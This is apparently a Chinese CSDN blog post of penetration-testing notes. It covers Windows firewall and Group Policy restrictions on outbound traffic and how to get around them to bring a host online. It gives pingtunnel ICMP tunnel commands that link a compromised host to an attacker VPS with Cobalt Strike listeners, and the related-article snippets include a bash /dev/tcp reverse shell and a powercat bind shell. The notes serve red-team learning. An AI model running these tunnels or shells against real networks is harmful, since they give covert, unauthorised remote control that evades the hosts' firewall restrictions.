内网渗透笔记之入站出站限制、隧道搭建

最新推荐文章于 2024-11-02 15:22:06 发布
最新推荐文章于 2024-11-02 15:22:06 发布
阅读量1k 收藏 21
点赞数 28
文章标签: 笔记 网络 经验分享 系统安全 网络攻击模型 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68408599/article/details/137103954
版权

0x01知识点:

0、防火墙组策略对象

1、OSI 七层协议模型

2、正反向监听器说明

3、隧道技术分层协议

4、CS&MSF&控制上线

-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)

-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

#系列点:

1、判断什么时候用代理

2、判断什么时候用隧道

3、判断出网和不出网协议

4、如何使用代理建立节点并连接

5、如何使用隧道技术封装协议上线

6、判断哪些代理或隧道情况选择放弃

0x02单机-防火墙-限制端口出入站

熟悉常见主机配置不出网的方式

1、入站&出站&连接安全

这里没有设置规则,发现外联了一个IP地址,但是设置如下规则后就不能上线了。但是如果你用其他协议,不用tcp协议,也可以进行上线

主站出站TCP封杀,入站没有,无互联网

正向连接(取得一台有网络的权限,把数据传递给出网的机器,通过出网机器控制)

主站出站TCP封杀,入站没有,有互联网

正向连接(取得一台有网络的权限,把数据传递给出网的机器,通过出网机器控制)

隧道技术(走其他协议出网)

2、域&专用&公网&状态

3、阻止&允许&其他配置

0x03单机-防火墙-限制协议出入站

熟悉常见主机配置不出网的方式

1、程序&端口&预定义&自定义

2、协议&TCP&UDP&ICMP&L2TP 等

#域控-防火墙-组策略对象同步

熟悉常见主机配置不出网的操作流程

操作:组策略管理-域-创建 GPO 链接-防火墙设置

更新策略:强制&命令&重启

命令:gpupdate/force

#域控-防火墙-组策略不出网上线

背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制 TCP 出网,其

中规则为出站规则,安全研究者通过入站取得 SHELL 权限,需要对其进行上线控制。

思路:正向连接&隧道技术

如果是入站被限制呢?反向连接&隧道技术也可以解决(前提看限制的多不多)

ICMP 协议项目:

https://github.com/esrrhs/spp

https://github.com/bdamele/icmpsh

https://github.com/esrrhs/pingtunnel

1、CS-ICMP-上线

被攻击主机发送出去的数据是ICMP,攻击者经过工具接收到的是TCP数据

注:以下隧道需要获得管理员权限

VPS:

./pingtunnel -type server

肉鸡:(管理器运行)

pingtunnel.exe -type client -l 127.0.0.1:5555 -s 82.157.166.165 -t 82.157.166.165:6666 -tcp 1 -noprint 1 -nolog 1

CS:

监听器 1:127.0.0.1 6666

监听器 2:192.168.46.66 7777

生成监听器 1 的 Stager 后门肉鸡执行

首先设置如下两个监听器:

选择该模块进行监听:

首先先在攻击机上建立会话

在远程主机下输入以下命令,并运行后门文件,可观察到已经上线(administrator权限)

B10SS0MS
关注
内网渗透-域防火墙+入规则+组策略对象同步+不出隧道上线
xiaoheizi的博客
11-02 1424
5.限制协议:在来到规则——右键 新建规则 ——端口——选择 TCP和所有端口——阻止连接——选择 域——名字:TCP协议控制。2.因为使用的是reverse监听器方式,所以是,使用的是9527端口。如果目标主机的规则中TCP协议被封杀,入规则没有封杀,有互联网络。3.fhq处右键——编辑——来到 高级安全 windows 防火墙——右键 属性。1.查看一台域内主机的防火墙状态,域和专用网络是开启状态,公用网络关闭状态。4.我们配置为:域——启用 专用和公用——关闭。
内网渗透—域防火墙策略同步、不出隧道上线
剁椒鱼头没剁椒的博客
05-16 1770
在之前的域信息收集一章节中大概了解了一些关于域方面的信息收集,良好的信息收集,能够最大化实现我们想要的目标,而我们在进行内网渗透的时候,通常已经是通过WEB的文件上传、命令执行等操作已经获取一定的权限了,而我们在获取这些权限的时候,我们还想获取更多的操作,那么就可能会遇到域,而在域中我们最终的目标就是获取域控的权限,而获取到域控权限后,也就实现了我们最终的目标,而如果在内网中没有域,那么就简单了。而本章主要涉及域方面的防火墙的知识,如果我们碰到开启域防火墙后该如何操作…
域防火墙&入规则
Innocence_0的博客
01-29 1173
背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP,其中规则为规则,安全研究者通过入取得SHELL权限,需要对其进行上线控制。,这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包,可点击下方二维码链接领取哦。ICMP协议项目:将TCP协议数据封装成ICMP协议数据 隧道技术。3-13号,使用了本地kali复现成功了,真实vps没有复现成功。那么问题又来了,作为萌新小白,我应该先学什么,再学什么?2、协议&TCP&UDP&ICMP&L2TP等。
什么是防火墙的入规则和规则.如何新建入规则
闪光小龙虾
11-05 7563
简单的说 就是你访问外就是外访问你 用户可以创建入规则,从而阻挡或者允许特定程序或者端口进行连接; 可以使用预先设置的规则,也可以创建自定义规则,“新建规则向导”可以帮用户逐步完成创建规则的步骤;用户可以将规则应用于一组程序、端口或者服务,也可以将规则应用于所有程序或者某个特定程序;可以阻挡某个软件进行所有连接、允许所有连接,或者只允许安全连接,并要求使用加密来保护通过该连接发送的数据的安全性; 可以为入流量配置源IP地址及目的地IP地址,同样还可以为源TCP和UDP端口及目的
windows防火墙的规则和入规则
demonXwire的博客
01-27 2114
windows防火墙的规则和入规则
内网渗透之设置内网代理隧道
mudi13的博客
09-05 1339
只要能设置代理的工具 ,都可以使用。代理的端口设置在 CS服务器所在的主机
2024年最新内网渗透之传输层隧道搭建_内网隧道工具lcx(1),看这一篇就够了
2401_84300239的博客
05-06 972
在测试环境中,有三台主机,其中Windows 7主机可以通过ping访问Windows Server 2008主机和Kali主机,而Kali主机和Windows Server 2008主机之间无法通过网络连接。在一般情况下,目‍标主机中是没有 nc 的。上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2024年最新内网渗透之传输层隧道搭建_内网隧道工具lcx,2024最新网络安全面试题目
2401_84300255的博客
05-06 668
在测试环境中,有三台主机,其中Windows 7主机可以通过ping访问Windows Server 2008主机和Kali主机,而Kali主机和Windows Server 2008主机之间无法通过网络连接。技术文档也是我自己整理的,包括我参加大型安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
【靶场】双重内网渗透测试场景_利用冰蝎搭建隧道,2024年最新手把手教你5G时代Webview的正确使用姿势
2401_84253850的博客
04-18 1050
bash -i >& /dev/tcp/公ip/端口 0>&1。发现tomcat 的ip为192.168.20.1:8080。上传webshell:这里是tomcat弱密码漏洞。注意这种方式不稳定不怕麻烦使用frp代理。执行./frpc -c frpc.ini。卡中有30段:测试是否
2024年最新内网渗透之传输层隧道搭建_内网隧道工具lcx(2),关于网络安全开发的面试经验总结
2401_84300255的博客
05-06 572
如果客户端连接服务器,服务器想要获取客户端的Shell,就称为反向 Shell。在Windows 7服务器上执行监听命令“powercat -l-p 8080-e cmd.exe -v”,然后在 Kali Linux主机上执行“netcat 192.168.56.130 8080-vv”命令。使用以下命令,从抓取的 Banner 信息中可以获取目标主机21端口上运行的vsFTPd服务,版本号为2.3.4。在目标主机中输入以下命令,与VPS的333端口建立连接,并传输名为test.txt的文本文件。
红队内网攻防渗透:内网渗透内网各种工具平台的使用
HACKONE的博客
04-10 458
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
【Windows】windows7/10/11通用,开放防火墙入端口配置
热门推荐
源林氏的笔记本
08-26 1万+
进入控制面板 -- 系统和安全 -- 防火墙点击左侧【高级设置】,进入【高级安全xxx防火墙】
规则
xiaomisolo的博客
10-11 1万+
参考https://zhidao.baidu.com/question/397135594.html 部署一个端口号为80的web程序,结果其他机器访问不到,但是能ping通。当关闭防火墙时,即可访问,但当开启防火墙时又失败。原因在于防火墙的规则。 防火墙入规则:别人电脑访问自己电脑的规则(允许或禁止某些ip或端口等); 防火墙规则:自己电脑访问别人电脑的规则(允许或禁止某些...
嵌入式通信协议:UART简明学习笔记
weixin_73867577的博客
10-31 762
学习UART串口的简明学习笔记
[自用,更新自day5]瑞吉外卖代码及笔记
lapiii的博客
11-01 823
当使用ThreadLocal维护变量时,ThreadLocal为每个使用该变量的线程提供独立的变量副本,所以每一个线程都可以独立地改变自己的副本,而不会影响其它线程所对应的副本。Mybatis Plus公共字段自动填充,也就是在插入或者更新的时候为指定字段赋予指定的值,使用它的好处就是可以统一对这些字段进行处理,避免了重复代码。因为在分页查询的Dish的records(菜品记录中),只有这个菜品所属的categoryId,但是我们需要分页的时候展示的是菜品名字。
嵌入式通信协议:MODBUS简明学习笔记
最新发布
weixin_73867577的博客
11-02 222
学习Modbus的简明学习笔记
【Kotlin】 基础语法笔记
xuanyulevel6的博客
10-31 840
kotlin基础语法学习笔记
diffusion model 学习笔记
wubing's 博客
11-01 941
郎之万公式: 描述了粒子做随机布朗运动 (粒子位置随时间变化的关系), 是一种 SDE, 描述了 由梯度力(即.即我们在无条件模型 DDPM 估计的噪声中添加一个微小的扰动(. 基本上,在采样一半时,基本上预测的。输的是噪声的估计, 这个估计的噪声。通过上面的公式,我们可以知道,当知道。),就可以作为条件模型的噪声估计.首先,假设我们已经有了一个训练好的。: 每一步中保留的原始信号的比例。的计算有各种不同的方法,). 已经接近于真实的。)影响的系统的时间演化.也就是,我们训练的网络
内网渗透:利用漏洞提权与网络限制破解策略
接下来,作者提到内网限制主要表现为某些设备(如ISA或Bluecoat代理防火墙)阻止了除正向通信外的网络访问,这要求渗透者具备策略性地穿透这些限制的能力。作者推荐参考《windows内网渗透科普指南》中的相关...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值